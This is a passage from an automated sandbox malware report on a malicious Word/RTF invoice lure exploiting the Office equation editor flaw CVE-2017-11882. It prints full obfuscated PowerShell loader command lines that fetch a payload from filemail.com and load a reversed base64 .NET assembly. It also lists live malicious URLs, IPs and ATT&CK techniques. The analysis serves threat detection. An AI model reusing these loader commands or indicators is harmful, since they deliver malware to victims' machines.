@(ssxtxt.lssws/klo/ue.hsupwsrellor.sup//:ptthssx, ssxdesativadossx, ssxdesativadossx, ssxdesat'+'ivadossx, ssxdesativ'+'adossx, ssx1ssx, ssxonedrivesetupssx,ssxdesativadossx, ssxdesativadossx,ssxdesativadossx'+',ssxd'+'esativadossx,ssxdesativadossx,ssx1ssx,ssxdes'+'ativadossx));').replace('k6p',[string][char]36).replace('hnl','|').replace(([char]115+[char]83+[char]88),[string][char]39) )"
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'lgagacgaiaaoafsauwb0ahiaaqbuaecaxqakahyarqbsaeiabwbtaguauabyaguargbfahiazqboagmazqapafsamqasadmaxqaraccaeaanac0aagbvaekabganaccakqaoacgajwbladyacabpag0ayqbnaguavqbyagwajwaraccaiaa9acaacwanacsajwbtafgaaab0ahqacabzadoalwanacsajwavadeamaaxadcalgbmagkabablag0ayqbpagwalgbjag8abqanacsajwavageacabpaccakwanac8azgbpagwazqavagcazqb0ad8azgbpagwazqbraguaeqanacsajwa9adiajwaraccaqqbhaccakwanaf8aygbxag8aoqbsaguadqa0aduadaa3aeiavqaxagsavgbnahmazaa5accakwanahaavaa5ahaajwaraccazwbtafmabab2afmadabhahiabgbuaekajwaraccaqwbmaeyaaabtafqaswbqaccakwanadmatabdadyauwbrahqasqbjae8aywbfafqamwa1ahcajgbwagsaxwb2agkazaa9agyazaa0agyangaxadqaygbiadiamaa5agmangayagmamqa3admamaa5adqanqaxadcangbhadaaoqawadqazgagahmauwbyadsaswa2ahaadwblagiaqwbsagkazqbuahqaiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4atgblahqalgbxaguaygbdaccakwanagwaaqblag4adaa7aesangbwagkabqbhagcazqbcahkadablahmaiaa9acaaswa2ahaadwblaccakwanagiaqwbsagkazqbuahqalgbeag8adwbuagwabwbhaccakwanagqarabhahqayqaoaesangbwagkabqbhagcazqbvahiabaapadsaswa2ahaaaqbtageazwblafqazqb4ahqaiaa9acaawwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoavqbuaeyaoaauaecazqb0afmadabyagkabgbnacgaswa2ahaaaqbtageazwblaeiaeqb0aguacwapadsaswa2ahaacwb0ageacgb0aeyababhagcaiaa9acaacwbtafgapaa8aeiaqqbtaeuanga0af8auwbuaeeaugbuad4apgbzafmawaa7aesangbwaguabgbkaeyababhagcaiaa9acaacwanacsajwbtafgapaa8aeiaqqbtaeuanga0af8arqanacsajwboaeqapga+ahmauwbyadsaswa2ahaacwb0ageacganacsajwb0aekabgbkaguaeaagad0aiabladyacabpag0ayqbnaguavablahgadaauaekabgbkaguaeabpagyakabladyacabzahqayqbyahqargbsageazwapadsaswa2ahaazqbuagqasqbuagqazqb4acaapqagaesangbwagkabqbhagcazqbuaguaeab0ac4asqbuagqazqb4ae8azgaoaesangbwaguabgbkaeyababhagcakqa7aesajwaraccangbwahmadabhahiadabjag4azablahgaiaatagcazqagadaaiaatageabgbkacaaswa2ahaazqbuagqasqbuagqazqb4acaalqbnahqajwaraccaiabladyacabzahqayqbyahqasqbuagqazqb4adsaswa2ahaacwb0ageacgb0aekabgbkaguaeaagacsapqagaesangbwahmadabhahiadabgagwayqbnac4atablag4azwb0aggaowbladyacabiageacwbladyanabmaguabgbnahqaaaagad0aiabladyacablag4azabjag4azablahgaiaatacaaswa2ahaacwb0ageacgb0aekabgbkaguaeaa7aesangbwagiayqbzaguanganacsajwa0aemabwbtag0ayqbuagqaiaa9acaaswa2ahaaaqbtageazwblaccakwanafqazqb4ahqalgbtahuaygbzahqacgbpag4azwaoaesangbwahmadabhahiadabjag4azablahgalaagaesangbwagiayqbzaguanga0aewazqbuagcadaboackaowbladyacabiageacwbladyanabsaguadgblahiacwblagqaiaa9acaalqbqag8aaqbuacaakabladyacabiageacwbladyanabdag8abqbtageabgbkac4avabvaemaaabhahiaqqbyahiajwaraccayqb5acgakqagaccakwanaggatgbmacaargbvahiarqbhagmaaaatae8aygbqaguaywb0acaaewagaesangbwaf8aiab9ackawwatadeajwaraccalgauac0akabladyacabiageacwbladyanabdag8abqanacsajwbtageabgbkac4atablag4azwb0aggakqbdadsaswa2ahaaywbvag0abqbhag4azabcahkadablahmaiaa9acaawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoaesangbwagiayqbzaguanga0afiazqb2aguacganacsajwbzaguazaapadsaswa2ahaababvageazablagqaqqbzahmazqbtagiabab5acaapqagafsauwb5ahJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ". ( ([string]$verbosepreference)[1,3]+'x'-join'')(('k6pimageurl'+' = s'+'sxhttps:/'+'/1017.filemail.com'+'/api'+'/file/get?filekey'+'=2'+'aa'+'_bwo9reu45t7bu1kvgsd9'+'pt9p'+'gsslvstgrnti'+'cffhmtkj'+'3lc6sqticoc_t35w&pk_vid=fd4f614bb209c62c1730945176a0904f ssx;k6pwebclient = new-object system.net.webc'+'lient;k6pimagebytes = k6pwe'+'bclient.downloa'+'ddata(k6pimageurl);k6pimagetext = [system.text.encoding]::utf8.getstring(k6pimagebytes);k6pstartflag = ssx<<base64_start>>ssx;k6pendflag = s'+'sx<<base64_e'+'nd>>ssx;k6pstar'+'tindex = k6pimagetext.indexof(k6pstartflag);k6pendindex = k6pimagetext.indexof(k6pendflag);k'+'6pstartindex -ge 0 -and k6pendindex -gt'+' k6pstartindex;k6pstartindex += k6pstartflag.length;k6pbase64length = k6pendindex - k6pstartindex;k6pbase6'+'4command = k6pimage'+'text.substring(k6pstartindex, k6pbase64length);k6pbase64reversed = -join (k6pbase64command.tochararr'+'ay() '+'hnl foreach-object { k6p_ })[-1'+'..-(k6pbase64com'+'mand.length)];k6pcommandbytes = [system.convert]::frombase64string(k6pbase64rever'+'sed);k6ploadedassembly = [sys'+'tem.reflection.assembly]::l'+'oad(k'+'6pcommandbytes);k6pvaimethod = [dn'+'lib.io.home].getm'+'ethod(ssxvaissx);k6pvaimethod.in'+'vok'+'e(k6pnul'+'l, @(ssxtxt.lssws/klo/ue.hsupwsrellor.sup//:ptthssx, ssxdesativadossx, ssxdesativadossx, ssxdesat'+'ivadossx, ssxdesativ'+'adossx, ssx1ssx, ssxonedrivesetupssx,ssxdesativadossx, ssxdesativadossx,ssxdesativadossx'+',ssxd'+'esativadossx,ssxdesativadossx,ssx1ssx,ssxdes'+'ativadossx));').replace('k6p',[string][char]36).replace('hnl','|').replace(([char]115+[char]83+[char]88),[string][char]39) )"Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information211
      Scripting
      Valid Accounts121
      Command and Scripting Interpreter
      211
      Scripting
      111
      Process Injection
      1
      Masquerading
      OS Credential Dumping1
      Security Software Discovery
      Remote Services1
      Archive Collected Data
      1
      Web Service
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts43
      Exploitation for Client Execution
      1
      DLL Side-Loading
      1
      DLL Side-Loading
      1
      Modify Registry
      LSASS Memory1
      Process Discovery
      Remote Desktop ProtocolData from Removable Media11
      Encrypted Channel
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts3
      PowerShell
      Logon Script (Windows)Logon Script (Windows)21
      Virtualization/Sandbox Evasion
      Security Account Manager21
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared Drive2
      Ingress Tool Transfer
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
      Process Injection
      NTDS1
      Application Window Discovery
      Distributed Component Object ModelInput Capture2
      Non-Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Deobfuscate/Decode Files or Information
      LSA Secrets1
      Remote System Discovery
      SSHKeylogging13
      Application Layer Protocol
      Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      Obfuscated Files or Information
      Cached Domain Credentials1
      File and Directory Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      Install Root Certificate
      DCSync13
      System Information Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      DLL Side-Loading
      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1551308 Sample: ConfirmaciXnXdeXfacturaXPed... Startdate: 07/11/2024 Architecture: WINDOWS Score: 100 51 Suricata IDS alerts for network traffic 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 Antivirus detection for URL or domain 2->55 57 19 other signatures 2->57 10 WINWORD.EXE 291 19 2->10         started        process3 process4 12 EQNEDT32.EXE 2 12 10->12         started        17 EQNEDT32.EXE 10->17         started        dnsIp5 43 sbv.pushswroller.eu 141.98.10.88, 49163, 49167, 80 HOSTBALTICLT Lithuania 12->43 35 C:\Users\user\AppData\Roaming\gdfgcvbi.vbs, ASCII 12->35 dropped 37 C:\Users\user\AppData\...\jukhccby[1].vbs, ASCII 12->37 dropped 81 Office equation editor establishes network connection 12->81 83 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 12->83 19 wscript.exe 2 12->19         started        file6 signatures7 process8 file9 33 C:\Users\user\...\gDHxsqtDodRnltJFOd.js, Unicode 19->33 dropped 59 System process connects to network (likely due to code injection or exploit) 19->59 61 Suspicious powershell command line found 19->61 63 Wscript starts Powershell (via cmd or directly) 19->63 65 3 other signatures 19->65 23 wscript.exe 1 19->23         started        signatures10 process11 dnsIp12 39 paste.ee 23->39 41 paste.ee 188.114.97.3, 443, 49164, 49165 CLOUDFLARENETUS European Union 23->41 67 System process connects to network (likely due to code injection or exploit) 23->67 69 Suspicious powershell command line found 23->69 71 Wscript starts Powershell (via cmd or directly) 23->71 75 2 other signatures 23->75 27 powershell.exe 4 23->27         started        signatures13 73 Connects to a pastebin service (likely for C&C) 39->73 process14 signatures15 77 Suspicious powershell command line found 27->77 79 Obfuscated command line found 27->79 30 powershell.exe 12 5 27->30         started        process16 dnsIp17 45 ip.1017.filemail.com 142.215.209.78, 443, 49166 HUMBER-COLLEGECA Canada 30->45 47 pus.rollerswpush.eu 30->47 49 1017.filemail.com 30->49

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      ConfirmaciXnXdeXfacturaXPedidoXadicional.doc45%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6S0%Avira URL Cloudsafe
      http://sbv.pushswroller.eu/tes/jukhccby.vbs8100%Avira URL Cloudmalware
      http://sbv.pushswroller.eu/tes/jukhccby.vbsj100%Avira URL Cloudmalware
      http://crl.comodO0%Avira URL Cloudsafe
      https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f0%Avira URL Cloudsafe
      http://sbv.pushswroller.eu/tes/jukhccby.vbs100%Avira URL Cloudmalware
      https://1017.filemail.com0%Avira URL Cloudsafe
      http://sbv.pushswroller.eu/tes/jukhccby.vbsmmC:100%Avira URL Cloudmalware
      http://pus.rollerswpush.eu/olk/SWSSL.txt100%Avira URL Cloudmalware
      NameIPActiveMaliciousAntivirus DetectionReputation
      pus.rollerswpush.eu
      141.98.10.88
      truetrue
        unknown
        paste.ee
        188.114.97.3
        truefalse
          high
          ip.1017.filemail.com
          142.215.209.78
          truetrue
            unknown
            sbv.pushswroller.eu
            141.98.10.88
            truetrue
              unknown
              1017.filemail.com
              unknown
              unknowntrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                http://pus.rollerswpush.eu/olk/SWSSL.txttrue
                • Avira URL Cloud: malware
                unknown
                https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904ftrue
                • Avira URL Cloud: safe
                unknown
                http://sbv.pushswroller.eu/tes/jukhccby.vbstrue
                • Avira URL Cloud: malware
                unknown
                https://paste.ee/d/qImtrfalse
                  high
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6Spowershell.exe, 00000009.00000002.420299334.000000000243A000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://nuget.org/NuGet.exepowershell.exe, 00000009.00000002.420299334.0000000003329000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://sbv.pushswroller.eu/tes/jukhccby.vbsjEQNEDT32.EXE, 00000002.00000002.358961758.00000000002CF000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://crl.entrust.net/server1.crl0wscript.exe, 00000006.00000003.367830363.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488167246.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367578867.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367931792.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.488529203.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.368205419.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367770621.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.427421639.0000000005053000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      http://ocsp.entrust.net03wscript.exe, 00000006.00000003.367830363.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488167246.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367578867.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367931792.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.488529203.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.368205419.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367770621.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.427421639.0000000005053000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://contoso.com/Licensepowershell.exe, 00000009.00000002.420299334.0000000003329000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://www.google.com;wscript.exe, 00000006.00000003.367830363.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007E5000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://contoso.com/Iconpowershell.exe, 00000009.00000002.420299334.0000000003329000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://1017.filemail.compowershell.exe, 00000009.00000002.420299334.000000000243A000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0wscript.exe, 00000006.00000003.367830363.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488167246.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367578867.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367931792.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.488529203.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.368205419.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367770621.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.427421639.0000000005053000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://analytics.paste.eewscript.exe, 00000006.00000003.367830363.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://www.diginotar.nl/cps/pkioverheid0wscript.exe, 00000006.00000003.367830363.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488167246.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367578867.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367931792.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.488529203.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.368205419.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367770621.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.427421639.0000000005053000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://paste.ee/d/qImtLHCIVJNQUKABWTPrwscript.exe, 00000006.00000003.368205419.00000000007A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367830363.00000000007A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367578867.00000000007A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367770621.00000000007A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367931792.00000000007A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://www.google.comwscript.exe, 00000006.00000003.367830363.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0wscript.exe, 00000006.00000003.367830363.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488167246.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367578867.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367931792.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.488529203.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.368205419.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367770621.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.427421639.0000000005053000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://paste.ee/d/qImtrqwscript.exe, 00000006.00000003.488095665.00000000003A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://paste.ee/d/qImLHCIVJNQUKABWTPtLHCIVJNQUKABWTPrwscript.exe, 00000006.00000003.368205419.00000000007A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367830363.00000000007A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367578867.00000000007A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367770621.00000000007A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367931792.00000000007A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://crl.comodOwscript.exe, 00000006.00000003.367931792.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367830363.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367578867.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367770621.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.368205419.00000000007E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://paste.ee/dLHCIVJNQUKABWTP/LHCIVJNQUKABWTPqLHCIVJNQUKABWTPILHCIVJNQUKABWTPmLHCIVJNQUKABWTPtLHCwscript.exe, 00000006.00000003.368205419.00000000007A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367830363.00000000007A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367578867.00000000007A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367770621.00000000007A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367931792.00000000007A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://contoso.com/powershell.exe, 00000009.00000002.420299334.0000000003329000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://nuget.org/nuget.exepowershell.exe, 00000009.00000002.420299334.0000000003329000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://analytics.paste.ee;wscript.exe, 00000006.00000003.367830363.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://sbv.pushswroller.eu/tes/jukhccby.vbsmmC:EQNEDT32.EXE, 00000002.00000002.358961758.00000000002CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://cdnjs.cloudflare.comwscript.exe, 00000006.00000003.367830363.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://sbv.pushswroller.eu/tes/jukhccby.vbs8EQNEDT32.EXE, 00000002.00000002.358961758.00000000002CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://cdnjs.cloudflare.com;wscript.exe, 00000006.00000003.367830363.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://paste.ee/d/qImtrnged;wscript.exe, 00000006.00000002.488497716.000000000076E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488280342.000000000076D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488197286.000000000076D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://ocsp.entrust.net0Dwscript.exe, 00000006.00000003.367830363.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488167246.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367578867.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367931792.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.488529203.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.368205419.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367770621.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.427421639.0000000005053000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.483386172.0000000002369000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.420299334.0000000002301000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://secure.comodo.com/CPS0wscript.exe, 00000006.00000003.367830363.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488167246.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367578867.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367931792.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.488529203.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.368205419.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367770621.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.427421639.0000000005053000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://secure.gravatar.comwscript.exe, 00000006.00000003.367830363.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://themes.googleusercontent.comwscript.exe, 00000006.00000003.367830363.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://crl.entrust.net/2048ca.crl0wscript.exe, 00000006.00000003.367830363.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488167246.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367578867.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367931792.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.488373471.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.488529203.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.368205419.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.367770621.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.427421639.0000000005053000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://github.com/dahall/taskschedulerpowershell.exe, 00000009.00000002.428248929.0000000006261000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          • No. of IPs < 25%
